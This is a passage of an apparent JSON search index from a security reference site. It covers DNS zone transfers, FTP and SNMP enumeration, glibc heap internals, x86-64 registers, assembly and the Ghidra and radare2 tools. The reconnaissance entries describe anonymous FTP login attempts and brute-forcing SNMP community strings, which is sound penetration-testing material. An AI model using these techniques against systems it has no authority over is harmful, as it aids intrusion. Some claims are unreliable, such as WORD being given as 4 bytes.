2007010401 3600 600 86400 600\n;; Query time: 4 msec\n;; SERVER: 192.168.129.138#53(192.168.129.138)\n;; WHEN: Fri Sep 17 22:38:47 EEST 2021\n;; XFR size: 27 records (messages 1, bytes 709)","breadcrumbs":"Reconnaissance » Enumeration » DNS Server Enumeration (53) » DNS Zone Transfer","id":"29","title":"DNS Zone Transfer"},"290":{"body":"The heap manager allocates resources in the so-called chunks . These chunks are stored adjacent to each other and must be 8-byte aligned or 16-byte aligned on 32-bit and 64-bit systems respectively. In addition to this padding, each chunks contains metadata which provides information about the chunk itself. Consequently, issuing a request for memory allocation on the heap actually allocates more bytes than originally requested. It is important to distinguish between in-use chunks and free (or previously allocated) chunks, since they have disparate memory layouts. The following diagram outlines a chunk that is in use: The size field contains the chunk size in bytes. The following three bits carry specific meaning: A (0x04) - Allocated arena. If this bit is 0, the chunk comes from the main arena and the main heap. If this bit is 1, the chunk comes from mmap'd memory and the location of the heap can be computed from the chunk's address. M (0x02) - If this bit is set, then the chunk was mmap-ed and isn't part of a heap. Typically used for large allocations. P (0x01) - If this bit is set, then the previous chunk should not be considered for coalescing and the mchunkptr points to a previous chunk still in use A free chunk looks a bit different: The size and AMP fields carry on the same meaning as those in chunks that are in use. Free chunks are organised in linked or doubly linked lists called bins . The fwd and bck pointers are utilised in the implementation of those linked lists. Different types of bins exist for different purposes. The top of the heap is by convention called the top chunk .","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Chunks","id":"290","title":"Chunks"},"291":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Memory Allocation on the Heap","id":"291","title":"Memory Allocation on the Heap"},"292":{"body":"When an application requests heap memory, the heap manager traverses the bins in search of a free chunk that is large enough to service the request. If such a chunk is found, it is removed from the bin, turned into an in-use chunk and then a pointer is returned to the user data section of the chunk.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating from Free Chunks","id":"292","title":"Allocating from Free Chunks"},"293":{"body":"If no free chunk is found that can service the request, the heap manager must construct an entirely new chunk at the top of heap. To achieve this, it first needs to ascertain whether there is enough space at the top of the heap to hold the new chunk.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating from the Top Chunk","id":"293","title":"Allocating from the Top Chunk"},"294":{"body":"Once the free space at the top of the heap is used up, the heap manager will have to ask the kernel for additional memory. On the initial heap, the heap manager asks the kernel to allocate more memory at the end of the heap by calling sbrk.On most Linux-based systems this function internally uses a system call called brk. Eventuall, the heap will grow to its maximum size, since expanding it any further would cause it to intrude on other sections of the process' address space. In this case, the heap manager will resort to using mmap to map new memory for heap expansions. If mmap also fails, then the process is unable to allocate more memory and malloc returns NULL.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Requesting Additional Memory at the Top of the Heap from the Kernel","id":"294","title":"Requesting Additional Memory at the Top of the Heap from the Kernel"},"295":{"body":"Large chunks get treated differently in their allocation. These are allocated off-heap through the direct use of mmap calls and this is reflected in the chunk's metadata by setting the M bit to 1. When such allocations are later returned to the heap manager via a call to free, the heap manager releases the entire mmap-ed region back to the system via munmap. Different platforms have different default thresholds for what counts as a large chunk and what doesn't.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating Large Chunks","id":"295","title":"Allocating Large Chunks"},"296":{"body":"Multithreaded applications require that internal data structures on the heap are protected from race conditions. In the past, the heap manager availed itself of a global mutex before every heap operation, however, significant performance issues arose as a result. Consequently, the concept of \"arenas\" was introduced. Each arena consists of a separate heap which manages its own chunk allocation and bins. Although each arena still utilises a mutex for its internal operations, different threads can make use of different arenas to avoid having to wait for each other. The initial (main) arena consists of a single heap and for single-threaded applications it is all there ever will exist. However, as more threads are spawned, new arenas are allocated and attached to them. Once all available arenas are being utilised by threads, the heap manager will commence creating new ones until a limit - 2 * Number of CPU cores for 32-bit and 8 * Number of CPU cores for 64-bit processes - is reached. Afterwards, multiple threads will be forced to share the same arena.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Arenas","id":"296","title":"Arenas"},"297":{"body":"Free chunks are organised in the so-called bins which are essentially linked lists. For performance reasons different types of bins exist. There are 62 small bins, 63 large bins, 1 unsorted bin, 10 fast bins and 64 tcache bins per thread. The last two appeared later and are built on top of the first three. Pointers to the small, large, and unsorted bins are stored in the same array in the heap manager: BIN[0] -> invalid (unused)\nBIN[1] -> unsorted bin\nBIN[2] to BIN[63] -> small bins\nBIN[64] to BIN[126] -> large bins","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Bins","id":"297","title":"Bins"},"298":{"body":"There are 62 small bins and each of them stores chunks of a fixed size. Each chunk with a size less than 512 bytes on 32-bit systems and 1024 bytes on 64-bit systems has a corresponding small bin. Small bins are sorted by default due to the fixed size of their elements and Insertion and removal of entries on these bins is incredibly fast.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Small Bins","id":"298","title":"Small Bins"},"299":{"body":"There are 63 large bins and they resemble small bins in their operation but store chunks of different sizes. Consequently, insertions and removal of entries on these lists is slower, since the entire bin has to be traversed in order to find a suitable chunk. There is a different number of bins allocated for specific chunk size ranges. The size of the chunk size range begins at 64 bytes - there are 32 bins all of which shift the range of chunk sizes they store by 64 from the previous bin. Following are 16 bins which shift the range by 512 bytes and so on. In essence: Bin 1 -> stores chunks of sizes 512 - 568 bytes; Bin 2 -> stores chunks of sizes 576 - 632 bytes; ... There are: Number of Bins Spacing between Bins 32 64 16 512 8 4096 4 32768 2 262144 1 Remaining chunk sizes","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Large Bins","id":"299","title":"Large Bins"},"3":{"body":"Any major changes outside of the eight category folders in the Notes/ directory are not permitted and will be rejected.","breadcrumbs":"Cyberclopaedia » Contributing » Out-of-Scope","id":"3","title":"Out-of-Scope"},"30":{"body":"The File Transfer Protocol (FTP) is a common protocol which you may find during a penetration test. It is a TCP-based protocol and runs on port 21. Luckily, its enumeration is simple and rather straight-forward. You can use the ftp command if you have credentials: ftp You can then proceed with typical navigation commands like dir, cd, pwd, get and send to navigate and interact with the remote file system. If you don't have credentials you can try with the usernames guest, anonymous, or ftp and an empty password in order to test for anonymous login.","breadcrumbs":"Reconnaissance » Enumeration » FTP Enumeration (21) » Introduction","id":"30","title":"Introduction"},"300":{"body":"There is a single unsorted bin. Chunks from small and large bins end up directly in this bin after they are freed. The point of the unsorted bin is to speed up allocations by serving a sort of cache. When malloc is invoked, it will first traverse this bin and see if it can immediately service the request. If not, it will move onto the small or large bins respectively.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Unsorted Bins","id":"300","title":"Unsorted Bins"},"301":{"body":"Fast bins provide a further optimisation layer. Recently released small chunks are put in fast bins and are not initially merged with their neighbours. This allows for them to be repurposed forthwith, should a malloc request for that chunk size come very soon after the chunk's release. There are 10 fast bins, covering chunks of size 16, 24, 32, 40, 48, 56, 64, 72, 80, and 88 bytes plus chunk metadata. Fast bins are implemented as singly linked lists and insertions and removals of entries in them are really fast. Periodically, the heap manager consolidates the heap - chunks in the fast bins are merged with the abutting chunks and inserted into the unsorted bin. This consolidation occurs when a malloc request is issued for a size that is larger than a fast bin can serve (chunks over 512 bytes on 32-bit systems and over 1024 bytes on 64-bit systems), when freeing a chunk larger than 64KB or when malloc_trim or mallopt is invoked.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Fast Bins","id":"301","title":"Fast Bins"},"302":{"body":"A new caching mechanism called tcache (thread local caching) was introduced in glibc version 2.26 back in 2017. The tcache stores bins of fixed size small chunks as singly linked lists. Similarly to a fast bin, chunks in tcache bins aren't merged with adjoining chunks. By default, there are 64 tcache bins, each containing a maximum of 7 same-sized chunks. The possible chunk sizes range from 12 to 516 bytes on 32-bit systems and from 24 to 1032 bytes on 64-bit systems. When a chunk is freed, the heap manager checks if the chunk fits into a tcache bin corresponding to that chunk size. If the tcache bin for this size is full or the chunk is simply too big to fit into a tcache bin, the heap manager obtains a lock on the arena and proceeds to comb through other bins in order to find a suitable one for the chunk. When malloc needs to service a request, it first checks the tcache for a chunk of the requested size that is available and should such a chunk be found, malloc will return it without ever having to obtain a lock. If the chunk too big, malloc continues as before. A slightly different strategy is employed if the requested chunk size does have a corresponding tcache bin, but that bin is simply full. In that case, malloc obtains a lock and promotes as many heap chunks of the requested size to tcache chunks, up to the tcache bin limit of 7. Subsequently, the last matching chunk is returned.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » TCache Bins","id":"302","title":"TCache Bins"},"303":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » malloc and free","id":"303","title":"malloc and free"},"304":{"body":"First, every allocation exists as a memory chunk which is aligned and contains metadata as well as the region the programmer wants. When a programmer requests memory from the heap, the heap manager first works out what chunk size the allocation request corresponds to, and then searches for the memory in the following order: If the size corresponds with a tcache bin and there is a tcache chunk available, return that immediately. If the request is huge, allocate a chunk off-heap via mmap. Otherwise obtain the arena heap lock and then perform the following steps, in order: Try the fastbin/smallbin recycling strategy If a corresponding fast bin exists, try and find a chunk from there (and also opportunistically prefill the tcache with entries from the fast bin). Otherwise, if a corresponding small bin exists, allocate from there (opportunistically prefilling the tcache as we go). Resolve all the deferred frees - Otherwise merge the entries in the fast bins and move their consolidated chunks to the unsorted bin. - Go through each entry in the unsorted bin. If it is suitable, return it. Otherwise, put the unsorted entry on its corresponding small/large bin as we go (possibly promoting small entries to the tcache). Default back to the basic recycling strategy If the chunk size corresponds with a large bin, search the corresponding large bin now. Create a new chunk from scratch Otherwise, there are no chunks available, so try and get a chunk from the top of the heap. If the top of the heap is not big enough, extend it using sbrk. If the top of the heap can’t be extended because we ran into something else in the address space, create a discontinuous extension using mmap and allocate from there If all else fails, return NULL.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocation","id":"304","title":"Allocation"},"305":{"body":"If the pointer is NULL, do nothing. Otherwise, convert the pointer back to a chunk by subtracting the size of the chunk metadata. Perform a few sanity checks on the chunk, and abort if the sanity checks fail. If the chunk fits into a tcache bin, store it there. If the chunk has the M bit set, give it back to the operating system via munmap. Otherwise we obtain the arena heap lock and then: If the chunk fits into a fastbin, put it on the corresponding fastbin. If the chunk size is greater than 64KB, consolidate the fastbins immediately and put the resulting merged chunks on the unsorted bin. Merge the chunk backwards and forwards with neighboring freed chunks in the small, large, and unsorted bins. If the resulting chunk lies at the top of the heap, merge it into the top chunk. Otherwise store it in the unsorted bin.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Deallocation","id":"305","title":"Deallocation"},"306":{"body":"Registers are value containers which reside on the CPU and not in RAM. They are small in size and some have special purposes. You may store both addresses and values in registers and depending on the instruction used the data inside will be interpreted in a different way - this is commonly called an addressing mode . In x86 Intel assembly (i386), the registers are 32 bits (4 bytes) in size and some of them are reserved: ebp - the base pointer, points to the bottom of the current stack frame esp - the stack pointer, points to the top of the current stack frame eip - the instruction pointer, points to the next instruction to be executed The other registers are general purpose registers and can be used for anything you like: eax, ebx, ecx, edx, esi, edi. x64 AMD assembly (amd64) extends these 32-bit registers to 64-bit ones and denotes these new versions by replacing the initial e with an r: rbp, rsp, rip, rax, ... It is important to note that these are not different registers - eax and rax refer to the same space on the CPU, however, eax only provides access to the lower 32 bits of the 64-bit register. You can also get access to the lower 16 and 8 bits of the register using different names: 8 Byte Register Lower 4 Bytes Lower 2 Bytes Lower Byte rbp ebp bp bpl rsp esp sp spl rip eip rax eax ax al rbx ebx bx bl rcx ecx cx cl rdx edx dx dl rsi esi si sil rdi edi di dil r8 r8d r8w r8b r9 r9d r9w r9b r10 r10d r10w r10b r11 r11d r11w r11b r12 r12d r12w r12b r13 r13d r13w r13b r14 r14d r14w r14b r15 r15d r15w r15b Each row contains names which refer to different parts of the same register. Note, you cannot access the lower 16 or 8 bits of the instruction pointer. You might sometimes see WORD or DWORD being used in a similar context - WORD means 4 bytes and DWORD means 8 bytes.","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Registers","id":"306","title":"Registers"},"307":{"body":"Under x64 Linux, function arguments are passed via registers: rdi: First Argument\nrsi: Second Argument\nrdx: Third Argument\nrcx: Fourth Argument\nr8: Fifth Argument\nr9: Sixth Argument The return value is store in rax (eax on 32-bit machines).","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Register Use in x64 Linux","id":"307","title":"Register Use in x64 Linux"},"308":{"body":"Register dereferencing occurs when the value of the register is treated as an address to the actual data to be used, rather than the data itself. This means that addressed can be stored in registers and used later - this is useful when dealing with large data sizes. For example, mov rax, [rdx] Will check the value inside rdx and treat it as an address - it will go to the location where this address points and get its data from there. It will then move this data into rax. If we hadn't used [], it would have treated the address in rdx simply as a value and moved it directly into rax.","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Register Dereferencing","id":"308","title":"Register Dereferencing"},"309":{"body":"Ghidra is an open-source framework for reverse engineering developed by the NSA. It groups binaries into projects which can be shared amonst multiple people.","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Introduction","id":"309","title":"Introduction"},"31":{"body":"You will need working knowledge of SNMP in order to follow through.","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » Introduction","id":"31","title":"Introduction"},"310":{"body":"To install Ghidra, you can run sudo apt install ghidra.","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Installation","id":"310","title":"Installation"},"311":{"body":"File -> New Project Non-Shared Project Select Directory Name the Project","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Creating a Project and Loading a Binary » Creating a Project","id":"311","title":"Creating a Project"},"312":{"body":"File -> Import File Select the binary you want to import Ghidra will automatically detect certain information about the file After importing, Ghidra will display an Import Results Summary containing information about the binary","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Creating a Project and Loading a Binary » Loading a Binary","id":"312","title":"Loading a Binary"},"313":{"body":"Double-clicking on a program will open it in the Code Browser. A prompt will appear for analysing the binary. Ghidra will attempt to create and label functions, as well as identify any cross-references in memory. Once the binary has been analysed you will be presented with the following screen:","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Initial Analysis » Initial Analysis","id":"313","title":"Initial Analysis"},"314":{"body":"radare2 is an open-source framework for reverse engineering. The framework includes multiple tools which all work in tandem in order to aid in the analysis of binary files. It uses short abbreviations for its commands - single letters - and many of its commands have subcommands which are also expressed as single letters. Luckily, you can always append a ? to a specific command in order to view its subcommands and what they do. To quit radare2, use the q command.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Introduction","id":"314","title":"Introduction"},"315":{"body":"You can load a binary by invoking the r2 command. You might sometimes need to also add the -e io.cache=true option in order to fix relocations in disassembly.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Loading a Binary","id":"315","title":"Loading a Binary"},"316":{"body":"aaa - analyse the binary afl - list the analysed functions axt - list all the places where a function is called. Note, you need to use the flag name that redare automatically creates for funtions after aaa.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Analysis » Analysis","id":"316","title":"Analysis"},"317":{"body":"/ - search the bytes of the binary for a specific string /w - search for wide character strings like Unicode symbols","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Strings » Strings","id":"317","title":"Strings"},"318":{"body":"i - display file information ie - find the program's entry point iM - find the program's main function iz - pull the hard-coded strings from the executable (only the data sections), use izz to get the strings from the entire binary","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Binary Info » Binary Info","id":"318","title":"Binary Info"},"319":{"body":"Flags resemble bookmarks. They associate a name with a given offset in a file. Create a new flag f @ offset You can also remove a flag by appending - to the command: f- List available flags - f: Rename a flag fr ","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Flags","id":"319","title":"Flags"},"32":{"body":"snmp-check is a simple utility for basic SNMP enumeration. You only need to provide it with the IP address to enumerate: snmp-check [IP] Furthermore, you have the following command-line options: -p: Change the port to enumerate. Default is 161. -c: Change the community string to use. Default is public -v: Change the SNMP version to use. Default is v1. There are additional arguments that can be provided but these are the salient ones.","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » SNMP Enumeration using snmp-check","id":"32","title":"SNMP Enumeration using snmp-check"},"320":{"body":"Flag names should be unique for addressing reasons. However, it is often the case that you need to have simple and ubiquitous names like loop or return. For this purpose exist the so-called \"local\" flags, which are tied to the function where they reside. It is possible to add them using f. command:","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Local Flags","id":"320","title":"Local Flags"},"321":{"body":"Flags can be grouped into flag spaces - is a namespace for flags, grouping together similar flags. Some flag spaces include sections, registers, symbols. These are managed with the fs command. [0x00001080]> fs?\nUsage: fs [*] [+-][flagspace|addr] # Manage flagspaces\n| fs display flagspaces\n| fs* display flagspaces as r2 commands\n| fsj display flagspaces in JSON\n| fs * select all flagspaces\n| fs flagspace select flagspace or create if it doesn't exist\n| fs-flagspace remove flagspace\n| fs-* remove all flagspaces\n| fs+foo push previous flagspace and set\n| fs- pop to the previous flagspace\n| fs-. remove the current flagspace\n| fsq list flagspaces in quiet mode\n| fsm [addr] move flags at given address to the current flagspace\n| fss display flagspaces stack\n| fss* display flagspaces stack in r2 commands\n| fssj display flagspaces stack in JSON\n| fsr newname rename selected flagspace","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Flag Spaces","id":"321","title":"Flag Spaces"},"322":{"body":"Moving around the file requires the usage of the seek (s) command in order to change the offset at which we are. It takes one argument which is a mathematical expression capable of containing flag names, parenthesis, addition, substraction, multiplication of immediates of contents of memory using brackets. Examples: [0x00000000]> s 0x10\n[0x00000010]> s+4\n[0x00000014]> s-\n[0x00000010]> s+\n[0x00000014]> Here is a list of additional seeking commands: [0x00000000]> s?\nUsage: s # Help for the seek commands. See ?$? to see all variables\n| s Print current address\n| s.hexoff Seek honoring a base from core->offset\n| s:pad Print current address with N padded zeros (defaults to 8)\n| s addr Seek to address\n| s- Undo seek\n| s-* Reset undo seek history\n| s- n Seek n bytes backward\n| s--[n] Seek blocksize bytes backward (/=n)\n| s+ Redo seek\n| s+ n Seek n bytes forward\n| s++[n] Seek blocksize bytes forward (/=n)\n| s[j*=!] List undo seek history (JSON, =list, *r2, !=names, s==)\n| s/ DATA Search for next occurrence of 'DATA'\n| s/x 9091 Search for next occurrence of \\x90\\x91\n| sa [[+-]a] [asz] Seek asz (or bsize) aligned to addr\n| sb Seek aligned to bb start\n| sC[?] string Seek to comment matching given string\n| sf Seek to next function (f->addr+f->size)\n| sf function Seek to address of specified function\n| sf. Seek to the beginning of current function\n| sg/sG Seek begin (sg) or end (sG) of section or file\n| sl[?] [+-]line Seek to line\n| sn/sp ([nkey]) Seek to next/prev location, as specified by scr.nkey\n| so [N] Seek to N next opcode(s)\n| sr pc Seek to register\n| ss Seek silently (without adding an entry to the seek history) > 3s++ ; 3 times block-seeking\n> s 10+0x80 ; seek at 0x80+10","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Seeking » Seeking","id":"322","title":"Seeking"},"323":{"body":"","breadcrumbs":"Reverse Engineering » Assembly Programming » Introduction","id":"323","title":"Introduction"},"324":{"body":"","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Introduction","id":"324","title":"Introduction"},"325":{"body":"Variables in assembly do not exists in the same sense as they do in higher-level programming languages. This is especially true of local variabls such as those inside functions. Instead of allocating space for a particular value and having that place be \"named\" according to a variable, the compiler may use a combination of stack and heap allocations as well as registers to achieve behaviour resembling a variable. That being said, there are some parallels with higher-level programming languages as well. When manually programming assembly, it should be noted that variable names are more or less identical to addresses.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Introduction","id":"325","title":"Introduction"},"326":{"body":"Assembly constants cannot be changed during run-time execution. Their value is substituted at assembly-time (corresponding to compile-time substitution for constants in higher-level languages). Consequently, constants are not even assigned a location in memory, for they turn into hard-coded values. Defining constants in assembly is done in the following way: equ For example, EXAMPLE equ 0xdeadbeef","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Constants","id":"326","title":"Constants"},"327":{"body":"Static or global variables which are initialised before the programme executes are stored in the .data section. In order to define such a variable, you must give it a name, data size and value. In contrast with constants, such data can be mutated during run-time. The following data size declarations can be used: Declaration Size (in bits) Type db 8 dw 16 dd 32 dq 64 ddq 128 Integer dt 128 Floating-Point The syntax for declaring such variables is as follows: For example: byteVar db 0x1A ; byte variable","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Static Initialised Data","id":"327","title":"Static Initialised Data"},"328":{"body":"Static uninitialised data is stored in the .bss section. The syntax for allocating such variables is following: Such variables are usually allocated as chunks, hence the required count. The primary data types are as follows: Declaration Size (in bits) resb 8 resw 16 resd 32 resq 64 resdq 128 Some examples: bArr resb 10 ; 10 element byte array wArr resw 50 ; 50 element word array dArr resd 100 ; 100 element double array qArr resq 200 ; 200 element quad array","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Static Uninitialised Data","id":"328","title":"Static Uninitialised Data"},"329":{"body":"Data representation refers to the way that values are stored in a computer. For technical reasons, computers do not use the familiar base-10 number system but rather avail themselves of the base-2 (binary) system. Under this paradigm, numbers are represented as 1's and 0's.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Introduction","id":"329","title":"Introduction"},"33":{"body":"snmpwalk is a much more versatile tool for SNMP enumeration. It's syntax is mostly the same as snmp-check:","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » SNMP Enumeration using snmpwalk","id":"33","title":"SNMP Enumeration using snmpwalk"},"330":{"body":"When storing an integer value, there are two ways to represent it - signed and unsigned - depending on whether the value should be entirely non-negative or may also have a \"-\" sign. Based on the number of bits used for storing a value, the value may have a different range. Size Range Size Unsigned Range Signed Range Byte (8 bits) 28 [0..255] [−128..+127] Word (16 bits) 216 [0..65,535] [−32,768..+32,767] Doubleword (32 bits) 232 [0..4,294,967,295] [−2,147,483,648..+2,147,483,647] Quadword (64 bits) 264 [0..264−1] [−263..+263−1] Double Quadword (128 bits) 2128 [0..2128−1] [−2127..+2127−1] Unsigned integers are represented in their typical binary form.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Integer Representation","id":"330","title":"Integer Representation"},"331":{"body":"Signed integers are represented using two's complement. In order to convert a acquire the negative form of a number in two's complement, is two negate all of its bits and add 1 to the number. A corollary of this representation is that it adds no complexity to the addition and subtraction operations.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Two's Complement","id":"331","title":"Two's Complement"},"332":{"body":"Addressing modes refer to the supported methods for accessing and manipulating data. There are three basic addressing modes in x86-64: register, immediate and memory.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Introduction","id":"332","title":"Introduction"},"333":{"body":"In register mode addressing, the operand is a register ( brain undergoing nuclear-fission ). mov rax, rbx The value inside rbx is copied to rax.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Register Mode Addressing","id":"333","title":"Register Mode Addressing"},"334":{"body":"In immediate mode addressing, the operand is an immediate value, or a literal . These are simply constant values such as 10, 0xfa3, \"lol\", and so on. mov rax, 123 The number 123 is copied into rax.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Immediate Mode Addressing","id":"334","title":"Immediate Mode Addressing"},"335":{"body":"In memory mode addressing, the operand is treated as a memory location. This is referred to as indirection or dereferencing and is similar to how pointers can be dereferenced in C/C++. In assembly, this is done by wrapping the operand in square brackets: []. So for example, rax refers to the value stored within the register rax. However, [rax] means \"treat rax like a pointer and use the value it points to\". Essentially, [rax] treats the value inside the register as an address and uses that address to find the actual value it needs. mov DWORD PTR [rax], 0xdeadbeef The value 0xdeadbeef is copied into the location pointed to by rax. Since memory is byte-addressable, it is oftentimes required to specify how many bytes we want to access. This is done by prepending one of the following specifiers to the operand: Specifier Number of Bytes BYTE PTR / byte 1 WORD PTR / word 2 DWORD PTR / dword 4 QWORD PTR / qword 8 Moreover, the actual formula for memory addressing is a bit more complicated, since it was developed mainly for making the implementation of arrays easier. [baseAddr + (indexReg * scaleValue) + offset] The baseAddr must be a register or variable name, although it may be omitted in which case the address is relative to the beginning of the data segment. indexReg is a register which specifies contains an index into the array and the scaleValue is the size (in bytes) of a single member of the array. The offset must be an immediate value. mov eax, dword [ebx] ; move into eax the value which ebx points to\nmov rax, QWORD PTR [rbx + rsi] ; move into rax the value which (rbx + rsi) points to\nmov rcx, qword [rax+(rsi*8)] ; move into rcx the value which (rax + (rsi*8)) points to","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Memory Mode Addressing","id":"335","title":"Memory Mode Addressing"},"336":{"body":"Memory is nothing more than a series of bytes which can be individually addressed. When storing values which are larger than a single byte, the bytes under the x86-64 paradigms are stored in little-endian order - the least significant byte (LSB) at the lowest memory address and the most significant byte (MSB) at the highest memory address. For example, the variable var = 0xDEADBEEF would be represented in memory as follows: Note how the right-most byte is at a lower address and the addresses for the rest of the bytes increase as we go right-to-left.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Memory » Endianness","id":"336","title":"Endianness"},"337":{"body":"Below is the general memory layout of a programme: The reserved section is unavailable to user programmes. The .text sections stores the instructions which comprise the programme's code. Static variables which were declared and given a value at assemble-time are stored in the .data section. The .bss section stores static uninitialised data, i.e variables which were declared but were not provided with an initial value. If such variables are used before they are initialised, their value will be meaningless. The Stack and the Heap are where data can be allocated at run-time. The Stack is used for allocating space for small amounts of data with a size known at compile-time and grows from higher to lower addresses. Conversely, the Heap allows for the dynamic allocation of space for data of size known at run-time and grows from lower to higher addresses.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Memory » Memory Layout","id":"337","title":"Memory Layout"},"338":{"body":"Registers are value containers which reside on the CPU (separately from RAM). They are small in size and some have special purposes. x86-64 assembly operates with 16 general-purpose registers (GPRs). It should be noted that the 8-byte (r) variants do not exist in 32-bit mode. 64-bit Register Lower 4 Bytes Lower 2 Bytes Lower 1 Byte rbp ebp bp bpl rsp esp sp spl rip eip rax eax ax al rbx ebx bx bl rcx ecx cx cl rdx edx dx dl rsi esi si sil rdi edi di dil r8 r8d r8w r8b r9 r9d r9w r9b r10 r10d r10w r10b r11 r11d r11w r11b r12 r12d r12w r12b r13 r13d r13w r13b r14 r14d r14w r14b r15 r15d r15w r15b Each row contains names which refer to different parts of the same register. Note, the lower 16 bits of the rip register (instruction pointer) are inaccessible on their own. For example, the rax register could be set to the following: rax = 0x0000 000AB 10CA 07F0 The name eax would then only refer to the part of the rax register which contains 10CA 07F0. Similarly, ax would represent 07F0, and al would be just F0. Additionally, the upper byte of ax, bx, cx and dx may be separately accessed by means of the ah, bh, ch and dh monikers, which exist for legacy reasons.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Introduction","id":"338","title":"Introduction"},"339":{"body":"Not all registers available in the x86-64 paradigm are created equal. Certain registers are reserved for specific purposes, despite being called general-purpose.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Register Specialisation","id":"339","title":"Register Specialisation"},"34":{"body":"Notwithstanding its age, onesixtyone is a good tool which allows you to bruteforce community strings by specifying a file instead of a single string with its -c option. It's syntax is rather simple:","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » Bruteforce community strings with onesixtyone","id":"34","title":"Bruteforce community strings with onesixtyone"},"340":{"body":"The stack pointer rsp (esp for 32-bit machines) is used to point to the current top of the stack and should not be used for any other purpose other than in instructions which involve stack manipulation.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Stack Pointer rsp","id":"340","title":"The Stack Pointer rsp"},"341":{"body":"The base pointer rbp (ebp for 32-bit machines) is the twin brother of the stack pointer and is used as a base pointer when calling functions. It points to the beginning of the current function's stack frame. Interestingly enough, its use is actually gratuitous because compilers can manage the stack frames of functions equally well without a separate base pointer. It is mostly used to make assembly code more comprehensible for humans.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Base Pointer rbp","id":"341","title":"The Base Pointer rbp"},"342":{"body":"The instruction pointer rip (eip for 32-bit machines) points to the next instruction to be executed. It is paramount not to get confused when using a debugger, since the rip does not actually point to the instruction currently being executed.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Instruction Pointer rip","id":"342","title":"The Instruction Pointer rip"},"343":{"body":"The flag register rFlags (eFlags for 32-bit machines) is an isolated register which is automatically updated by the CPU after every instruction and is not directly accessible by programmes. Following is a table of the meaning assigned to different bits of this register. Note that only the lower 32 bits are used even on 64-bit machines. Name Symbol Bit Usage =1 =0 Carry CF 0 Indicates whether the previous operation resulted in a carry-over. CY (Carry) CN (No Carry) 1 Reserved. Always set to 1 for eFlags. Parity PF 2 Indicates whether the least significant byte of the previous instruction's result has an even number of 1's. PE (Parity Even) PO (Parity Odd) 3 Reserved. Auxiliary Carry AF 4 Used to support binary-coded decimal operations. AC (Auxiliary Carry) NA (No Auxiliary Carry) 5 Reserved. Zero ZF 6 Indicates whether the previous operation resulted in a zero. ZR (Zero) NZ (Not Zero) Sign SF 7 Indicates whether the most significant bit was set to 1 in the previous operation (implies a negative result in signed-data contexts). NG (Negative) PL (Positive) Trap TF 8 Used by debuggers when single-stepping through a programme. Interrupt Enable IF 9 Indicates whether or not the CPU should immediately respond to maskable hardware interrupts. EI (Enable Interrupt) DI (Disable Interrupt) Direction DF 10 Indicates the direction in which several bytes of data should be copied from one location to another. DN (Down) UP (Up) Overflow OF 11 Indicates whether the previous operation resulted in an integer overflow. OV (Overflow) NV (No Overflow) I/O Privilege Level IOPL 12-13 Nested Task NT 14 Mode MD 15 Resume RF 16 Virtual 8086 